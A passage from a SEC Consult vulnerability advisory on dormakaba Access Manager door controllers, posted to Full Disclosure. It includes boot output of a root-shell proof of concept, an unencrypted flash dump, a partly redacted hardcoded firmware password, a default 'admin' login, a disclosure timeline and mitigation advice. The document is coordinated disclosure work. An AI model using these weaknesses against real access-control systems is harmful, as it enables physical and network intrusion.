GCC 7.3-2018.05) 7.3.1 20180425 [linaro-7.3-2018.05 revision
d29120a424ecfbc167ef90065c0eeb7f91977701], GNU ld (Linaro_Binutils-2018.05) 2.28.2.20170706)
#1 SMP Tue Jun 6 10:39:07 UTC 2023
[0.000000] CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
[...]
[2.768093] Run /bin/sh as init process
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
----------------------------------------------------------------
Thus, the attacker now has full access to the system.
11) Unencrypted Flash Storage (CVE-2025-59105)
Every Access Manager is equipped with a flash chip that contains the whole Windows CE
embedded or Linux-based operating system as well as the configuration, binaries and
libraries to run the Access Manager. The flash chip itself can be easily desoldered
from the Access Manager.
The contents can be dumped and analyzed. It was identified that the whole flash dump
is unencrypted. This allows an attacker to easily analyze the applications, as well as
extract secrets, like passwords and cryptographic keys.
12) Web Server Running with Root Privileges (CVE-2025-59106)
No separate proof of concept was created.
13) Static Firmware Encryption Password (CVE-2025-59107)
The hardcoded firmware encryption password is found in a DLL which belongs
to the tool FWServiceTool. The DLL Firmware.Container.dll contains the ZIP
password and can be extracted by disassembling the DLL in dnSpy.
The .NET class FirmwareContainerFactory then contains the password:
private const string Password = "649dce<redacted>801c81";
14) Weak Default Passwords (CVE-2025-59108)
The password 'admin' can be used to login to the web interface of the Access Manager,
to change arbitrary settings or to gain access to a full database export. This password
is set by default and a user is not forced to change the password.
Vulnerable / tested versions:
-----------------------------
Initially, many vulnerabilities were identified in a dormakaba access manager
9200-k5 (03.03.016 RA). However, the versions 04.06.189 RA (9200-k5) and
05.00.073 RA and 05.01.088 RA (9200-k7) were also subject to testing. For the
detailed version information, refer to the vulnerability descriptions above.
Vendor contact timeline:
------------------------
2024-04-02: Contacting vendor throughsecuritysupport@...makaba.com, no response
2024-04-05: Contacting vendor again throughsecuritysupport@...makaba.com, no response
2024-04-09: Contacting vendor again throughinfo@...makaba.com andhelpdesk.awm.ch@...makaba.com
2024-04-09:info@...makaba.com andhelpdesk.awm.ch@...makaba.com informed us
that they are not responsible for Austrian "Customers" and we should
contact the Austrian dormakaba entity.
2024-04-09: Contacting vendor again throughinfo@...makaba.com,helpdesk.awm.ch@...makaba.com
andsecuritysupport@...makaba.com. Explaining that this is not a local
Austrian problem, but a global issue for dormakaba. Requesting a Global
Security Contact.
2024-04-09: Instead of forwarding our message to the global security team a local
Austrian dormakaba representative called us. We closed the call down by
requesting a contact of dormakaba's global security team.
2024-04-09: Austrian representatives requests the advisory via E-Mail. Asking for
confirmation, if mail encryption is supported or if the advisory
shall be forwarded unencrypted.
2024-04-10: Scheduling a conference call with the Austrian contact to clarify everything
and explain the security issues.
2024-04-10: Conference call got cancelled. The Austrian contact forwarded our request to
the headquarter in Switzerland.
2024-04-10: dormakaba's CISO contacted us via email and informed us to get back to us
as soon as possible.
2024-04-12: dormakaba's DVP Systems Access Control und Owner Security Governance contacted
us via email and provided us with a secure channel to submit the advisory. The
advisory got submitted immediately.
2024-04-12: dormakaba's DVP Systems Access Control und Owner Security Governance requests
details about the tested firmware and software version.
2024-04-15: SEC Consult provides detailed software and firmware version that was tested.
2024-04-16: dormakaba updates us and informs us that they are actively investigating
the reported issues.
2024-04-30: Asking for a status update & offering a meeting to discuss any questions.
2024-04-30: dormakaba's CISO replies by accepting our meeting offer. Scheduling a meeting
for 2024-05-07.
2024-05-07: Meeting with dormakaba's CISO and DVP Systems Access Control. All vulnerabilities
are confirmed and actively worked on. Discussing further steps and agreeing on a
monthly update meeting with dormakaba.
2024-05-08: Providing further details concerning the vulnerabilities as well as
providing a set of questions (Vulnerable Versions, Firmware, Revisions), proposing
meeting dates; no response
2024-05-23: Asking for a status update, no response
2024-06-03: Asking again for a status update.
2024-06-04: dormakaba's CISO replies with a meeting invite.
2024-06-05: Meeting with dormakaba for the scheduled monthly update meeting.
2024-07-24: Asking again for a status update, no response.
2024-07-31: Asking again for a status update or meeting, no response.
2024-08-19: Asking again for a status update or meeting.
2024-08-27: Scheduling a call for 2024-09-03
2024-09-03: dormakaba technician provides status update about which vulnerabilities are already
fixed in the next release and on which they are still actively working on.
2024-11-12: Asking for a status update and informing dormakaba that we tested a newer hardware
release of the dormakaba Access Manager (9200-K7) which is based on Linux.
Multiple new critical vulnerabilities were identified. A separate advisory
is in the making.
2024-12-12: Meeting with dormakaba to discuss new identified issues in other hardware releases.
2025-01-16: Added vulnerability "Unauthenticated access to the internal SQLite Database" &
"Static firmware encryption password", see SEC Consult advisory 20260126-1.
2025-01-17: Providing updated advisory to dormakaba, asking for a status update regarding
the other issues.
2025-01-28: Asking for status update again. Vendor responds that they received our
updated advisory and they are preparing a feedback.
2025-02 - 2026-01: Monthly meetings with dormakaba to discuss the current developments.
2026-01-26: Public release of the advisory.
Solution:
---------
In general, we recommend the following workflow when it comes to
mitigating the vulnerabilities and issues mentioned in this advisory:
- Check your exos 9300 and access manager version numbers.
- Contact your dormakaba partner.
- The vulnerabilities detailed in this advisory have
been worked on and fixed by dormakaba over the past 18 months
- Chances are high that your devices are already up to date,
or they have already the necessary steps available for you to
mitigate all (remaining) issues in your environment.
- Clarify with your dormakaba partner:
- If there are any manual steps that must be done after an update to
fully prevent the vulnerabilities.
- If the official hardening guide in the latest version is already implemented.
- How to implement mTLS for the SOAP API in your environment
- If old hardware revisions are in use (e.g. Access Manager 9200-k5) replace
them as soon as possible with newer hardware.
- Review the website provided by dormakaba which was created specifically
for all the vulnerabilities documented in this advisory for more details
and insights from the manufacturer side. The vendor's security page is
available at the following location:https://www.dormakabagroup.com/en/security-advisories
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:https://blog.sec-consult.com
X:https://x.com/sec_consult
EOF Werner Schober, Clemens Stockenreitner / @2026
Download attachment "smime.p7s" of type "application/pkcs7-signature" (4995 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists